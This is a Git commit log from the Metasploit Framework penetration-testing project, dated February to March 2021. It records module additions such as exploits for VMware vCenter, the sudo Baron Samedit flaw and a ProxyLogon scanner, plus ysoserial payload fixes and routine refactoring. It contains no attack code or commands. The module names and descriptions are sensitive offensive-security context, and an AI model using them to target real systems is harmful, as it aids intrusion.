[https://github.com/rapid7/metasploit-framework/issues/14790#issue-81372544](https://github.com/rapid7/metasploit-framework/issues/14790#issue-813725448,"https://github.com/rapid7/metasploit-framework/issues/14790#issue-813725448")

Please remind me if any issue is found with the fix! ;-)
2021-03-12 00:02:11 +05:30
Metasploit 085720c284 automatic module_metadata_base.json update 2021-03-11 12:13:46 -06:00
Spencer McIntyre aaf7e21def Update the microfocus_ucmdb_unauth_deser module to use the new mixin
This updates the microfocus_ucmdb_unauth_deser module to use the new
Java Deserialization mixin. Unfortunately we do not have access to the
software for testing so these changes can not be verified.
2021-03-11 12:09:29 -06:00
Spencer McIntyre d580e7d122 Fix some documentation, remove unnecessary code and fix a filename typo 2021-03-11 12:09:29 -06:00
Spencer McIntyre 3bd430a7d0 Update the spec to reflect that the original type was removed 2021-03-11 12:09:29 -06:00
Spencer McIntyre abd15f723c Update dockerfile comments and pin jar versions
Pin the JAR versions so future travelers know what I was using today.
This should make the build deterministic. You're welcome.
2021-03-11 12:09:29 -06:00
Spencer McIntyre b0239b34e3 Document the new java deserialization mixin methods 2021-03-11 12:09:29 -06:00
Spencer McIntyre a227d00275 Add additional setup notes for some modules 2021-03-11 12:09:29 -06:00
Spencer McIntyre 8d2e644f4f Add a new Java Deserialization mixin and use it to set the shell 2021-03-11 12:09:29 -06:00
Spencer McIntyre 2bd6b7abc7 Specify the modified_type when generating ysoserial payloads
Fixes #13753
2021-03-11 12:09:29 -06:00
Spencer McIntyre 58be5b6add Regenerate a functioning YSoSerial data set 2021-03-11 12:09:29 -06:00
Spencer McIntyre 3ecf0914e1 Use 'none' as the original ysoserial type, increase the size
Increasing the size to occupy two bytes seems to be helping stabilize
the generation for both the ROME and CommonsCollections1 payloads.
2021-03-11 12:09:29 -06:00
Spencer McIntyre 515d8fa853 Revert a subset of the changes from d39b1c911d which broke a payload
Adjusting the value used as a buffer offset in commit d39b1c911d broke
the CommonsCollections1 YSoSerial payload chain.
2021-03-11 12:09:29 -06:00
Spencer McIntyre 64387ff9c0 Fix multiple issues with find_ysoserial_offsets
1) The output of ysoserial changed so update the number of dropped lines.
2) Pin the diff-lcs gem to version 1.3 because 1.4 breaks the script
3) Generate all payloads by default
2021-03-11 12:09:29 -06:00
Shelby Pace 458c3d815e Land #14880, remove redundant rubocop disables 2021-03-11 11:57:43 -06:00
cgranleese-r7 a953626f2d Adds a fix and improves error handling 2021-03-11 17:37:19 +00:00
Alan Foster f5edb5a105 Remove redundant rubocop disables 2021-03-11 17:23:44 +00:00
dwelch-r7 fce10b8b76 fix autoloading when using the rpc client 2021-03-11 16:42:34 +00:00
Gabriel Garcia fff46afb3b Refactoring URL building 2021-03-11 08:13:02 -08:00
Jeffrey Martin c61ef79f86 minor adjustments for scopes 2021-03-11 10:04:43 -06:00
Jeffrey Martin 1f12c0a372 wrap loader to enable tweaks 2021-03-11 09:32:09 -06:00
Security Curious 59086989f7 Update Firefox Default Profile Directory
The default firefox profile directory now no longer ends in `.default`
but instead `.default-release`. For backwards compat the new regex
supports both. For more information see:

https://support.mozilla.org/bm/questions/1264072#answer-1235567

It's possible we might want to also support things like
`.default-nightly`, etc but really if we want to do more than grab
the default profile we should read the `profiles.ini` file to get
an itemized list of profiles from Firefox itself. This would also
future-proof this script.

Since profiles are not generally used by most Firefox users just going
for the simpler solution of looking for `.default-release`.
2021-03-10 21:43:04 -05:00
sophosyaniv b11d8c9d04 fix tidy 2021-03-10 12:55:23 -08:00
RAMELLA Sébastien b03877d8fb add. download email attachments + refactorize 2021-03-10 21:12:00 +04:00
dwelch-r7 c9200ff1e4 Land #14872, Remove bit struct 2021-03-10 14:53:01 +00:00
dwelch-r7 bedbfbf000 Add autoload for REXML 2021-03-10 14:45:05 +00:00
dwelch-r7 5f1916072c Handle modules failing to be created when checking compatibility 2021-03-10 14:36:38 +00:00
adfoster-r7 75315d51d3 Land #14871, Add autoload for bindata 2021-03-10 13:53:26 +00:00
Alan Foster 40e0d361ae Remove bit struct 2021-03-10 12:58:09 +00:00
sophosyaniv dfd0df8264 add documentation 2021-03-10 04:32:21 -08:00
dwelch-r7 ab93041409 Add autoload for bindata 2021-03-10 12:15:18 +00:00
dwelch-r7 a4dec77536 replace print_error with print_warning when loading duplicate extensions 2021-03-10 12:11:48 +00:00
sophosyaniv b2f4df4148 fix lint 2021-03-09 19:33:08 -08:00
RAMELLA Sébastien f7fe97a145 rename gather module name 2021-03-09 23:52:01 +04:00
RAMELLA Sébastien 932098dccf add. gather capability module 2021-03-09 23:46:07 +04:00
sophosyaniv 1405d19fde Add files via upload
add exchange.ps1
2021-03-09 11:37:42 -08:00
sophosyaniv be23957eb3 Add files via upload
add exchange.rb
2021-03-09 11:36:52 -08:00
RAMELLA Sébastien cac1be89bb fix. typo 2021-03-09 23:27:54 +04:00
dwelch-r7 38688e1429 Only fire off on_session_open event after we know the session is fully initialised 2021-03-09 18:32:03 +00:00
Metasploit 17ef194c52 automatic module_metadata_base.json update 2021-03-08 16:58:04 -06:00
Shelby Pace fbd6f19d04 Land #14846, add HPE SIM unauth AMF deser rce 2021-03-08 16:50:49 -06:00
Grant Willcox 514d46bd4d Rubocop module again and also update the documentation to reflect recent changes 2021-03-08 16:08:36 -06:00
Grant Willcox 8479f01290 Improve the check logic to more accurately detect if a target is vulnerable or not 2021-03-08 15:59:26 -06:00
Grant Willcox 2e45962cc0 Change gsub! to gsub so that we don't end up with nil errors when a match isn't found 2021-03-08 15:11:58 -06:00
Shelby Pace d114641468 Land #14201, add favorite command 2021-03-08 13:06:22 -06:00
Metasploit c4517329c1 automatic module_metadata_base.json update 2021-03-08 08:08:22 -06:00
Spencer McIntyre 2562a261e2 Land #14809, Add VMware vCenter Server CVE-2021-21972 exploit 2021-03-08 09:01:40 -05:00
RAMELLA Sébastien 3b5db039db fix. msftidy + rubocop 2021-03-08 14:20:56 +04:00
RAMELLA Sébastien 385a834b0d apply rubocop... 2021-03-07 17:57:33 +04:00
RAMELLA Sébastien 6b91fbf523 oups... remove old fortios module files. 2021-03-07 17:48:09 +04:00
RAMELLA Sébastien 5e0b8d97a9 add. auxiliary scanner for ProxyLogon (CVE-2021-26855) 2021-03-07 17:37:20 +04:00
Gabriel Garcia 4c004a4cc9 Appending HTTP(S) when SSL is enabled 2021-03-06 17:09:20 -08:00
Berkan f9ac1acabc Target check code part has been improved. 2021-03-06 23:46:55 +03:00
Berkan 8b149a2c9b Fixed line numbers of verification steps 2021-03-06 22:50:12 +03:00
kalba-security ab632b93d1 Drop x86 target, add checks for Windows Update nil setting and for when TiWorker.exe is already running on the target 2021-03-06 10:47:59 -05:00
kalba-security 22662c18ad Merge branch 'space-r7-pr-14201' into fav_modules 2021-03-06 07:24:24 -05:00
William Vu 729994d4af Update module doc 2021-03-05 17:25:37 -06:00
William Vu bcf7ad000b Add CheckModule to fingerprint VMware product 2021-03-05 17:25:37 -06:00
William Vu 33e52b0fb2 Update and refactor check
Now with more science!
2021-03-05 17:25:37 -06:00
William Vu 7bbb4cc09a Add module doc 2021-03-05 17:25:37 -06:00
William Vu 26f1c209b2 Add VMware vCenter Server CVE-2021-21972 exploit 2021-03-05 17:25:37 -06:00
Spencer McIntyre cba591f0e2 Land #14857, Update metasploit-payloads gem to 2.0.37 2021-03-05 13:43:16 -05:00
Grant Willcox 02e89947c7 Update check method to fix an incorrect check code, change from Appears to Detected 2021-03-05 11:16:24 -06:00
Grant Willcox 2b488800e6 Update the check method to eliminate potential false positives by searching for the presence of three strings that together should only be returned by HPE SIM web servers. 2021-03-05 11:14:30 -06:00
Spencer McIntyre d35f2bc2fe Update metasploit-payloads gem to 2.0.37 2021-03-05 11:26:54 -05:00
Metasploit 5a3f1ba8d7 automatic module_metadata_base.json update 2021-03-05 08:31:52 -06:00
Spencer McIntyre 53f4d3f193 Land #14792, Apply fixes for invalid architecture checks to affected modules
Fixes #14599
2021-03-05 09:24:34 -05:00
Metasploit 1a4f3f7d6c automatic module_metadata_base.json update 2021-03-05 04:08:41 -06:00
Christophe De La Fuente 32899a61ea Land #14847, Add Microsoft Windows RRAS Service MIBEntryGet Overflow 2021-03-05 11:01:58 +01:00
capme 4ed489c12c fix method check for linux/ftp/proftp_telnet_iac module 2021-03-05 14:49:51 +07:00
Grant Willcox 59d7288773 RuboCop module and fix small spelling mistake in documentation 2021-03-04 18:48:19 -06:00
Grant Willcox f193caa48e Also make sure that the default option is to use Windows Powershell since this supports Meterpreter and is generally a lot more reliable 2021-03-04 18:40:21 -06:00
Grant Willcox d739bf7809 Fix up payload_template_adjustments function to use a simpler loop like structure as per space-r7
's recommendations
2021-03-04 18:34:45 -06:00
Grant Willcox 41794fe4e7 Remove redundant assignments of sysinfo["Architecture"] to unused "arch" variable 2021-03-04 15:54:38 -06:00
Grant Willcox 306e1979af First round of code adjustments per review comments 2021-03-04 12:38:11 -06:00
Metasploit 8837345a2d Bump version of framework to 6.0.34 2021-03-04 12:04:28 -06:00
Berkan 1917d9620a Some exception code parts have fixed. 2021-03-04 20:47:52 +03:00
Grant Willcox 1d23b7becb Land #14853, Prefix Time with namespace resolution operator for lib/rex 2021-03-04 11:16:38 -06:00
Alan Foster af330874f5 Prefix time module with namespace resolution operator 2021-03-04 13:19:09 +00:00
Grant Willcox 5576a2c4e9 Land #14843, Extract PseudoShell into its own file for zeitwerk 2021-03-03 16:57:27 -06:00
Metasploit 2ca049c10a automatic module_metadata_base.json update 2021-03-03 16:06:34 -06:00
Grant Willcox 0b9cd7f6f4 Land #14816, Autoload faker to avoid potential missing constant errors 2021-03-03 15:59:18 -06:00
Grant Willcox f6fde70280 Land #14821 - Allow search to start from root path 2021-03-03 15:38:21 -06:00
Grant Willcox adbb6f164f Add source code for generating emp.ser 2021-03-03 10:14:48 -06:00
Grant Willcox 3ef8fcd996 Update module to fix an extra print statement and write documentation 2021-03-03 10:14:41 -06:00
Brendan Coles 3da8fce9cf Add Microsoft Windows RRAS Service MIBEntryGet Overflow 2021-03-03 02:50:42 +00:00
Grant Willcox f327d30e08 First attempt at CVE-2020-7200 module, with RuboCopped module 2021-03-02 16:38:19 -06:00
Shelby Pace 8ba02f4c97 add module limit, other minor changes 2021-03-02 16:26:01 -06:00
Grant Willcox 1e87453428 Land #14838, Add "Windows Storage Server 2008 R2" to MS17-010 psexec fingerprints 2021-03-02 10:22:03 -06:00
dwelch-r7 dc8fea2063 remove require 'faker' since we globally autoload it now 2021-03-02 13:59:32 +00:00
dwelch-r7 4755aea4b5 autoload faker globally 2021-03-02 13:49:38 +00:00
dwelch-r7 1e8ec469fb Extract PseudoShell into it's own file for zeitwerk to pick it up properly 2021-03-02 12:39:41 +00:00
Berkan 9617801bfd Edited document. 2021-03-02 15:05:48 +03:00
Berkan 45bfe40803 Refactored some code parts as mentioned. 2021-03-02 15:05:15 +03:00
agalway-r7 49e11fad1b Land #14840, remove unneeded require rex/ui statement
Remove extra `require` in msfrpc client
2021-03-02 11:27:21 +00:00
dwelch-r7 b833a7a421 Remove extra require for a now deleted file that no longer exists 2021-03-02 10:57:07 +00:00
zerosum0x0 fb393d8a36 add "Windows Storage Server 2008 R2" to fingerprints 2021-03-01 19:05:35 -07:00
Berkan 20f085fcaa Update fortilogger_arbitrary_fileupload.rb 2021-03-01 21:00:05 +03:00
Berkan bfecc5bf91 Update fortilogger_arbitrary_fileupload.rb 2021-03-01 20:53:27 +03:00
Berkan 97f6cac240 Update fortilogger_arbitrary_fileupload.rb 2021-03-01 20:42:28 +03:00
erberkan d3338e7380 fortilogger_arbitrary_fileupload 2021-03-01 19:30:39 +03:00
erberkan 648489cfe5 fortilogger_arbitrary_fileupdate 2021-03-01 17:55:55 +03:00
Gabriel Garcia 1223bd0852 Slightly more idiomatic way 2021-02-28 00:53:49 -08:00
Gabriel Garcia 1135135ce1 Fixing linting 2021-02-28 00:51:52 -08:00
Gabriel Garcia 5c0293c56b Skipping empty files for path traversal enumeration 2021-02-28 00:41:06 -08:00
Shelby Pace 0d8df5e0bf allow searches to start from root path 2021-02-26 15:53:33 -06:00
Metasploit 053853a86c automatic module_metadata_base.json update 2021-02-26 15:30:20 -06:00
Grant Willcox 5334f05ce2 Land #14518, Add fortios path traversal credential grabber (cve-2018-13379) 2021-02-26 15:22:27 -06:00
Grant Willcox 2124ec25ba Rename files and update the exploit module title to better reflect its purpose. Also fix a minor RuboCop related change
Fix up documentation to reflect recent file renaming changes.
2021-02-26 14:32:37 -06:00
Grant Willcox 32ad2908d6 Update documentation file to point out this only grabs info on logged in users, and to fix some msftidy_docs.rb issues and clear up some explanations 2021-02-26 14:32:36 -06:00
RAMELLA Sébastien 801164a244 fix. separator for creds collector. 2021-02-26 14:32:29 -06:00
RAMELLA Sébastien eb5f418fe2 fix. some rubocop recommendations 2021-02-26 14:32:21 -06:00
RAMELLA Sébastien b84909fe67 change parsing method 2021-02-26 14:32:20 -06:00
RAMELLA Sébastien a0f5da45e3 update module documentation 2021-02-26 14:32:20 -06:00
RAMELLA Sébastien 82c8b55be9 fix. remove call to eval and some minor change 2021-02-26 14:32:19 -06:00
RAMELLA Sébastien 7eb91e76ab add. fortios path traversal (cve-2018-13379) 2021-02-26 14:32:13 -06:00
Metasploit 0ea4153a99 automatic module_metadata_base.json update 2021-02-26 11:25:49 -06:00
Grant Willcox 6d939c16ce Land #14783, Update KarjaSoft Sami FTP Server v2.0.2 USER Overflow module 2021-02-26 11:17:05 -06:00
Paul Werther c570c9f30e add documentation and linting (rubocop) 2021-02-26 16:16:23 +01:00
RAMELLA Sébastien 70b260cb40 fix. separator 2021-02-26 16:52:55 +04:00
RAMELLA Sébastien ee2abf40fb fix. separator for creds collector. 2021-02-26 11:37:24 +04:00
Metasploit 10624c86b8 automatic module_metadata_base.json update 2021-02-25 16:10:33 -06:00
Grant Willcox fa8a592bb2 Land #14814, Disable Style/StringConcatenation Rubocop rule 2021-02-25 16:04:09 -06:00
Brendan Coles 743248d993 Update KarjaSoft Sami FTP Server v2.0.2 USER Overflow module 2021-02-25 20:53:30 +00:00
Alan Foster 94a6207884 Disable Style/StringConcatenation Rubocop rule 2021-02-25 20:20:38 +00:00
Metasploit 95aa24ee4c Bump version of framework to 6.0.33 2021-02-25 12:03:54 -06:00
Grant Willcox 038ccf19ef Land #14769, Handle nil versions in preparation for rubygems 4 2021-02-25 11:27:42 -06:00
Brendan Coles f89d67df19 dup_scout_enterprise_login_bof: Add v9.9.14 target and auto targeting 2021-02-25 17:14:25 +00:00
Brendan Coles 1f00ad011c dupscts_bof: Add additional targets and auto targeting 2021-02-25 17:12:27 +00:00
dwelch-r7 a6461a0cfe rubocop 2021-02-25 16:47:49 +00:00
dwelch-r7 319f15d938 Handle nil versions for rubygems 4 2021-02-25 16:47:49 +00:00
Metasploit a1cc6aafae automatic module_metadata_base.json update 2021-02-25 10:42:59 -06:00
Grant Willcox ff16c24d03 Land #14806, Rubocop recently landed modules continued 2021-02-25 10:36:50 -06:00
Spencer McIntyre 63421b47c5 Land #14812, Add missing requires for SOCKS5 proxy 2021-02-25 09:32:59 -05:00
dwelch-r7 9eeb793bfd Add missing requires for scoks proxy 2021-02-25 14:16:17 +00:00
Alan Foster b06c5c12aa Rubocop recently landed modules continued 2021-02-25 14:13:40 +00:00
bwatters 7cdd41df76 Land #14544, RDP Web Login User Enumeration Auxiliary Module
Merge branch 'land-14544' into upstream-master
2021-02-24 16:10:41 -06:00
Grant Willcox 8f1ad11b90 Land #14802, Wrap kiwi cmd arguments in quotes 2021-02-24 15:20:10 -06:00
Metasploit 64807ad757 automatic module_metadata_base.json update 2021-02-24 11:46:34 -06:00
bwatters 18f6245637 Land #14648, Process Herpaderping evasion module
Merge branch 'land-14648' into upstream-master
2021-02-24 11:39:47 -06:00
bwatters 1acfa55dcd rubocop -a fixes 2021-02-24 11:38:06 -06:00
dwelch-r7 2ec29f3fe2 Wrap kiwi cmd arguments in quotes 2021-02-24 17:27:21 +00:00
dwelch-r7 844e2f70d0 Land #14801, Bump rex-text version to Re add color to search command 2021-02-24 17:04:36 +00:00
Alan Foster 45e22d53d2 Re-add color to search command 2021-02-24 16:28:45 +00:00
adfoster-r7 7515828cc5 Land #14799, Fix missing constant error when accessing the api web service 2021-02-24 16:18:40 +00:00
adfoster-r7 b8b5acfa73 Land #14800, Revert accidental commit to cmd_kiwi_cmd handling 2021-02-24 15:50:52 +00:00
dwelch-r7 0cb2bdf9db Revert accidental commit 2021-02-24 14:28:13 +00:00
dwelch-r7 36abf40d54 quote kiwi arguments 2021-02-24 14:22:48 +00:00
dwelch-r7 6f2ba26917 Fix missing constant error when accessing the api web service 2021-02-24 12:28:46 +00:00
Grant Willcox abd7117a5f Land #14735, Require rubocop for new modules 2021-02-23 21:12:04 -06:00
Alan Foster 260527076c Require rubocop for new modules 2021-02-23 23:05:48 +00:00
Metasploit b3312ea808 automatic module_metadata_base.json update 2021-02-23 09:29:39 -06:00
Spencer McIntyre 8c1721b845 Land #14766, Add Apache Flink JobManager Traversal 2021-02-23 10:16:42 -05:00
Spencer McIntyre f176f6b5de Use CheckCode::Unknown when the HTTP response is nil 2021-02-23 10:16:20 -05:00
Metasploit 22ffb4a954 automatic module_metadata_base.json update 2021-02-23 08:26:45 -06:00
Spencer McIntyre 1d5a6e4a0b Land #14771, Add Apache Flink JAR Upload Java Code Execution 2021-02-23 09:19:56 -05:00
Paul Werther 90cfbdd023 nicer formatting
Co-authored-by: bcoles <bcoles@gmail.com>
2021-02-23 10:08:27 +01:00
Grant Willcox f65b4155e5 Fix up modules to use more explicit reference to ARCH_X64 and to correctly check sysinfo['Architecture'] as per #14599 2021-02-22 18:47:46 -06:00
Brendan Coles 8a6c6d18fb Add Apache Flink JobManager Traversal 2021-02-22 23:03:58 +00:00
Brendan Coles 69031fa91f Add Apache Flink JAR Upload Java Code Execution 2021-02-22 23:00:57 +00:00
Metasploit 1ed4023bdf automatic module_metadata_base.json update 2021-02-22 15:01:38 -06:00
Spencer McIntyre 4d20e382a0 Land #14784, Update ScadaBR Credentials Dumper module 2021-02-22 15:55:14 -05:00
Spencer McIntyre 4f089c3004 Base64 encode stored hash data for JtR 2021-02-22 15:52:12 -05:00
Brendan Coles bc1ffec2c1 Update ScadaBR Credentials Dumper module 2021-02-22 20:32:55 +00:00
Grant Willcox 6f8821dd1d Land #14789, Fix session verification by checking TLV negotiation 2021-02-22 14:06:34 -06:00
Metasploit 65459111a2 automatic module_metadata_base.json update 2021-02-22 12:06:19 -06:00
Tim W edea755096 Land #14740, CVE-2021-3156 Sudo LPE (AKA: Baron Samedit) Improvements 2021-02-22 17:48:33 +00:00
Grant Willcox 5c886d46bf Land #14748, Fix Auxiliary::AuthBrute when using DB_ALL_USERS and DB_ALL_PASS options 2021-02-22 11:43:55 -06:00
Spencer McIntyre f2e1afed79 Fix session verification by checking TLV negotiation 2021-02-22 11:19:31 -05:00
Grant Willcox e0dfd5cf9a Land #14617, Better Handling for Incompatible Meterpreter Extensions and Commands 2021-02-19 18:19:09 -06:00
Spencer McIntyre 7c51dd0b68 Always define the detach and ssl_verify commands in the cmds hash
Defining the commands in the cmds hash is necessary for them to be
filtered and then reported to the user as incompatible when applicable.
This moves their special compatibility checks into the actual command
handler.
2021-02-19 15:51:41 -06:00
Spencer McIntyre 8a0a56f584 Use a more descriptive status indicator for command routines 2021-02-19 15:51:41 -06:00
Spencer McIntyre 97479066ba Disabling filtering via command IDs on Windows for now
Filtering via command IDs would be a backwards incompatible change, so
skip it on Windows until the payloads gem has had a major version bump.
2021-02-19 15:51:41 -06:00
Spencer McIntyre 2bc8ff8db7 Consistently return nil when an id or name fails to resolve 2021-02-19 15:51:40 -06:00
Spencer McIntyre 8a8994bb57 Raise a more specific error when loading an unsupported extension 2021-02-19 15:51:40 -06:00
Spencer McIntyre a587c166cb Add and use a callback to report meterpreter commands that are disabled 2021-02-19 15:51:40 -06:00
Spencer McIntyre b983365665 Filter Meterpreter commands based on support instead of fingerprinting 2021-02-19 15:51:39 -06:00
Spencer McIntyre 7cf5879836 Add a meterpreter test for enumerating core commands 2021-02-19 15:51:39 -06:00
Spencer McIntyre 998b38cf0d Enumerate Meterpreter's supported core commands 2021-02-19 15:51:33 -06:00
adfoster-r7 ae7e8c44b5 Land #14775, Lock ruby-prof until nightly builds can use c11 2021-02-19 21:42:42 +00:00
Metasploit a06ab8e041 automatic module_metadata_base.json update 2021-02-19 15:34:43 -06:00
Grant Willcox 0baaa30536 Land #14780, Update metasploit-payloads gem to 2.0.34 2021-02-19 15:27:27 -06:00
Spencer McIntyre 9ef6bf384e Update payload cached sizes 2021-02-19 15:35:36 -05:00
Grant Willcox 66c4388eda Land #14670, Enable word wrapped rex tables by default 2021-02-19 14:21:59 -06:00
dwelch-r7 3817ab9345 Land #14772, Extract module data store to its own file 2021-02-19 17:35:28 +00:00
Spencer McIntyre bd9ec27df7 Update metasploit-payloads gem to 2.0.34 2021-02-19 12:04:05 -05:00
Jeffrey Martin 3405a07e4f Lock ruby-prof until nightly builds can use c11
Due to https://github.com/ruby-prof/ruby-prof/commit/659faf3bc2b3f2fe715fb836a17571ff04910924 ruby-prof cannot be compiled on the centos6 currently used for nightly packaging by https://github.com/rapid7/metasploit-omnibus.  Lock to 1.4.2 until adjustments are made.
2021-02-19 08:42:28 -06:00
Metasploit bc456ec765 automatic module_metadata_base.json update 2021-02-19 07:54:32 -06:00
agalway-r7 8a339f54c1 Land #14734, updates and runs rubocop against recent modules
Rubocop recently landed modules
2021-02-19 13:48:47 +00:00
Alan Foster f3ce9082b6 Enable word wrapped rex tables by default 2021-02-19 13:23:31 +00:00
Metasploit 7b7f1a2637 automatic module_metadata_base.json update 2021-02-19 04:39:37 -06:00
agalway-r7 275e9c5454 Land #14696, Further Zeitwerk lands to improve boot speed
Zeitwerk rex folder
2021-02-19 10:33:37 +00:00
Alan Foster 6a349dad75 Extract module data store to its own file 2021-02-19 10:29:50 +00:00
kalba-security 68d4b197fa Add SrClient DLL Hijacking local exploit module and docs 2021-02-18 13:50:28 -05:00
Metasploit b3509f58ff Bump version of framework to 6.0.32 2021-02-18 12:04:28 -06:00
Jeffrey Martin 158dd89e53 guard when spawn is used with TcpServer mixin
added locations where the `super` from TcpServer could cause
deadlock waiting for a timeout when a thread is spawned
and fails to trigger the target make a request.
2021-02-18 10:42:56 -06:00
Metasploit 28b12891d4 automatic module_metadata_base.json update 2021-02-18 05:04:04 -06:00
Christophe De La Fuente bbdaf23672 Land #14576, Wordpress Plugin: Chopslider 3 SQLi 2021-02-18 11:49:07 +01:00
Jeffrey Martin 2e1dba1af1 guard thread in ftp module 2021-02-17 15:27:44 -06:00
k0pak4 8a4b6461e8 Final pylint updates to module 2021-02-17 08:16:11 -05:00
Alan Foster 5b3fde7735 Rubocop recently landed modules 2021-02-16 15:08:08 +00:00
dwelch-r7 4a380771d3 Land #14762, Ignore Rubocop ExtraSpacing rules for BinData objects 2021-02-16 12:01:11 +00:00
adfoster-r7 122b63214a Land #14756, msftidy: Add info check for exploit module notes 2021-02-16 11:36:19 +00:00
Brendan Coles bf8a353855 Land #14758, Fix Java Meterpreter stdapi screenshot command on Windows 2021-02-16 10:08:40 +00:00
k0pak4 9391480cb7 Update documentation with additional options and reference 2021-02-15 18:34:23 -05:00
k0pak4 8affc0e91a Add in proper realm reporting cred abilities 2021-02-15 18:20:56 -05:00
Alan Foster ecf8180538 Add custom whitespace cop for ignoring bindata 2021-02-15 20:26:05 +00:00
Christophe De La Fuente ab9dd177b7 Add kernel file version check to avoid BSOD on Win10 x86 2021-02-15 21:10:10 +01:00
Metasploit ecab3f6c2e automatic module_metadata_base.json update 2021-02-15 08:52:59 -06:00
adfoster-r7 b0758eb120 Land #14738, fix multi/manage/shell_to_meterpreter on macOS 2021-02-15 14:46:41 +00:00
Tim W eefc7465dd fix #14749, fix screenshot platform check 2021-02-15 14:03:44 +00:00
Brendan Coles f4c37bd446 msftidy: Add info check for exploit module notes 2021-02-15 11:01:01 +00:00
Metasploit cfe9cc9752 automatic module_metadata_base.json update 2021-02-15 04:31:11 -06:00
A Galway f227e82600 Land #14730, OBM Local PrivEsc to SYSTEM 2021-02-15 10:24:34 +00:00
Jeffrey Martin 43ecfe5138 Land #14602, Fix length detection & enhance hex 2021-02-14 12:37:48 -06:00
Metasploit 0758896f33 automatic module_metadata_base.json update 2021-02-14 12:19:50 -06:00
Jeffrey Martin 78a2fd1016 add autoload hint for postgresqli 2021-02-14 12:12:01 -06:00
Jeffrey Martin dbce3982fd Land #14067, [GSoC] Module for CVE-2019-13375, and PostgreSQL support for the library 2021-02-14 12:11:09 -06:00
Jeffrey Martin 7c4e42186d address merge conflict 2021-02-14 12:10:44 -06:00
Metasploit 9e740b12bb automatic module_metadata_base.json update 2021-02-14 00:30:42 -06:00
Grant Willcox 9460bffbf7 Land #14751, msftidy: Fix exploit module checks for author and stack buffer overflow 2021-02-14 00:23:24 -06:00
h00die 28aa29fcab updates from review 2021-02-13 15:11:39 -05:00
Brendan Coles a1c316c679 msftidy: Fix exploit module checks for author and stack buffer overflow 2021-02-13 04:10:13 +00:00
Metasploit 015fd1d2e5 automatic module_metadata_base.json update 2021-02-12 11:48:56 -06:00
Shelby Pace c1e2cfd9e7 Land #14744, add Klog Server unauth cmd injection 2021-02-12 11:40:57 -06:00
Brendan Coles bdc2041c83 Add Klog Server authenticate.php user Unauthenticated Command Injection 2021-02-12 17:07:52 +00:00
adfoster-r7 30d24b5d88 Land #14747, Fix usage of Failure:: constant 2021-02-12 17:01:15 +00:00
Metasploit 02c7680f8c automatic module_metadata_base.json update 2021-02-12 10:23:46 -06:00
dwelch-r7 f6c3de5732 Land #14733, Add latest Rubocop rules 2021-02-12 16:18:13 +00:00
Christophe De La Fuente cc1dde5ba8 Remove call to #creds in #build_credentials_array 2021-02-12 16:32:49 +01:00
Spencer McIntyre 01593f21b4 Add the Ubuntu 19.04 target for CVE-2021-3156 2021-02-12 10:06:47 -05:00
dwelch-r7 b6eb940e46 Fix usage of Failure:: constant 2021-02-12 14:33:05 +00:00
Spencer McIntyre 20067d183e Use single quotes for escaping arguments consistently 2021-02-12 08:59:38 -05:00
Alan Foster bed7ae2c78 Add latest rubocop rules 2021-02-12 13:31:51 +00:00
Spencer McIntyre 13b5f277e9 Land #14741, Fix a target version discrepancy in the CVE-2020-17132 docs 2021-02-11 18:50:05 -05:00
Spencer McIntyre 77cc799974 Fix a target version discrepancy in the CVE-2020-17132 docs 2021-02-11 18:04:03 -05:00
Metasploit ef6d0d13fb Bump version of framework to 6.0.31 2021-02-11 12:06:08 -06:00
Spencer McIntyre f31c7846d2 Escape shell arguments even more thoroughly 2021-02-11 12:25:28 -05:00
Spencer McIntyre cb8cd89a90 Update the module docs for cve-2021-3156 2021-02-11 11:57:05 -05:00
Metasploit a86e7f6e3d automatic module_metadata_base.json update 2021-02-11 08:23:00 -06:00
Christophe De La Fuente 88eaf97e79 Land #14607, Updates for Exchange ECP DLP Policy Exploit 2021-02-11 15:15:34 +01:00
Metasploit 2b94ce0396 automatic module_metadata_base.json update 2021-02-11 07:27:54 -06:00
Brendan Coles 9cbf25347e Land #14708, safari_proxy_object_type_confusion: Add offsets: 10.13.1 + 10.13.2
Add offsets for OSX 10.13.1 and 10.13.2
2021-02-11 13:17:53 +00:00
Tim W 40dd113d3b fix whitespace 2021-02-11 12:43:47 +00:00
Tim W 0ab4213630 use & disown 2021-02-11 12:26:27 +00:00
Tim W c5ba97100f fix osx shell_to_meterpreter to use python reflection 2021-02-11 11:38:43 +00:00
Spencer McIntyre 944e8d572d Register missing files for cleanup 2021-02-10 18:05:20 -05:00
Spencer McIntyre 6562f309ce Handle whitespace in the target path 2021-02-10 17:40:42 -05:00
Spencer McIntyre 8757eb33fe Add an automatic target that uses version fingerprinting 2021-02-10 16:16:33 -05:00
Spencer McIntyre 1f5f086c5e Updates for the Exchange ECP DLP Policy RCE module to randomize data 2021-02-10 15:00:39 -05:00
Spencer McIntyre b9dd1b927b Randomize the path to the library that's loaded 2021-02-10 08:45:52 -05:00
Spencer McIntyre 7f17202194 Consistently handle existing directories in mkdir 2021-02-10 08:45:52 -05:00
Jeffrey Martin f456c965ff Land #14714, Update sqlite3 version 2021-02-09 12:28:16 -06:00
Metasploit 4f0f08c8c4 automatic module_metadata_base.json update 2021-02-09 11:33:51 -06:00
Christophe De La Fuente 85b7e85d0b Land #14671, Micro Focus Multiple Products Authenticated RCE (CVE-2020-11853) 2021-02-09 18:24:57 +01:00
Pedro Ribeiro d884df96e2 fix msftidy docs 2021-02-09 14:37:35 +07:00
Pedro Ribeiro b6ad68c05d Merge branch 'obm' of https://github.com/pedrib/metasploit-framework into obm 2021-02-09 14:25:11 +07:00
Pedro Ribeiro 79cac47ba3 add suggestions by cdelafuente-r7 2021-02-09 14:24:49 +07:00
Pedro Ribeiro 9881512833 Update modules/exploits/multi/http/microfocus_obm_auth_rce.rb
Co-authored-by: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
2021-02-09 14:18:47 +07:00
Grant Willcox 5262a767b3 Land #14728, Update WPVDB link type 2021-02-08 14:35:17 -06:00
firefart f9e8ac8f58 update more references 2021-02-08 17:48:54 +01:00
dwelch-r7 7fbbe23426 Remove more requires that were missed before 2021-02-08 14:51:58 +00:00
k0pak4 c3ba13fe6b Add reference to blog post 2021-02-08 09:25:51 -05:00
dwelch-r7 043d8efdbf Formatting 2021-02-08 12:49:31 +00:00
dwelch-r7 d2c0924996 Relocate comment 2021-02-08 12:42:46 +00:00
dwelch-r7 b95be3ed10 Zeitwerk rex folder 2021-02-08 12:24:12 +00:00
firefart 1af4aaeb91 update WPVDB link type 2021-02-06 12:20:03 +01:00
